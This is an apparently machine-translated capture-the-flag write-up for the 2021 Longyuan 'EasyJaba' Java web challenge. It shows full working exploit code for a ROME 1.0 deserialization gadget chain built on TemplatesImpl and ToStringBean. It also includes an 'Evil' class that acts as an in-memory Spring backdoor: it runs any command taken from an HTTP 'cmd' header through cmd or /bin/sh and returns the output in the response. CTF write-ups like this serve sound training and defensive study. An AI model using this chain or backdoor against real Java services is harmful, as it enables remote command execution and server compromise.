Longyuan war " Epidemic disease "2021 Cyber security competition Web EasyJaba

View source code , Some classes are disabled

（ Let's talk about the decompiler , I used it all the time jd-gui, But the attachment of this topic , Use jd-gui, Unable to see the disabled information , as follows ; And the screenshot above , It's using jdax1.4）

At the same time, it is found that rome1.0, So it's used rome1.0 That chain

HashMap Class is used to trigger hashCode, and BadAttributeValueExpException Class is used to trigger toString, Look at the source code of this topic , You can directly call object.toString, You don't need an entry class

Rewrite it rome chain

package Rome;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;
import com.sun.syndication.feed.impl.ToStringBean;

import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;


public class Rome2 {
    

    public static void unserialize(byte[] bytes) throws Exception{
    
        ByteArrayInputStream bain = new ByteArrayInputStream(bytes);
        ObjectInputStream oin = new ObjectInputStream(bain);
        oin.readObject();
    }


    public static byte[] serialize(Object o) throws Exception{
    
        try(ByteArrayOutputStream baout = new ByteArrayOutputStream();
            ObjectOutputStream oout = new ObjectOutputStream(baout)){
    
            oout.writeObject(o);
            return baout.toByteArray();
        }
    }
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
    
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
    public static void main(String[] args) throws Exception {
    
        // Malicious bytecode 
        byte[] code = Files.readAllBytes(Paths.get("D:\\project\\java\\cc1\\src\\main\\java\\Rome\\Evil.class"));
// byte[] code = Files.readAllBytes(Paths.get("D:\\project\\java\\test\\target\\classes\\calc1.class"));
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates,"_name","sk1y");  // Cannot be set to null, Or return to null
        setFieldValue(templates,"_class",null);
        setFieldValue(templates,"_bytecodes",new byte[][]{
    code});
        setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
        ToStringBean toStringBean = new ToStringBean(Templates.class,templates);
// toStringBean.toString();
        byte[] aaa = serialize(toStringBean);
        System.out.println(Base64.getEncoder().encodeToString(aaa));
    }
}

Not out of the network

Because the problem can't be solved , So it uses what is circulated on the Internet spring Malicious classes loaded without going out of the network

package Rome;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.lang.reflect.Method;
import java.util.Scanner;

public class Evil extends AbstractTranslet
{
    
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    

    }
    public Evil() throws Exception{
    
        Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
        Method m = c.getMethod("getRequestAttributes");
        Object o = m.invoke(null);
        c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
        m = c.getMethod("getResponse");
        Method m1 = c.getMethod("getRequest");
        Object resp = m.invoke(o);
        Object req = m1.invoke(o); // HttpServletRequest
        Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
        Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);
        getHeader.setAccessible(true);
        getWriter.setAccessible(true);
        Object writer = getWriter.invoke(resp);
        String cmd = (String)getHeader.invoke(req, "cmd");
        String[] commands = new String[3];
        String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
        if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
    
            commands[0] = "cmd";
            commands[1] = "/c";
        } else {
    
            commands[0] = "/bin/sh";
            commands[1] = "-c";
        }
        commands[2] = cmd;
        writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(),charsetName).useDelimiter("\\A").next());
        writer.getClass().getDeclaredMethod("flush").invoke(writer);
        writer.getClass().getDeclaredMethod("close").invoke(writer);
    }
}

javac Compile to Evil.class, Load this malicious class

The final effect

see fmyyy Master's wp, You can actually use Hashtable Replace HashMap, Can also trigger hashCode, The original chain can be opened （ I didn't succeed , What should be the problem ）, The specific links are placed below

Reference link

1. java Deserialization rome Chain and Longyuan war epidemic java topic
2. Longyuan campaign 2021 ezjaba_ByNotD0g The blog of -CSDN Blog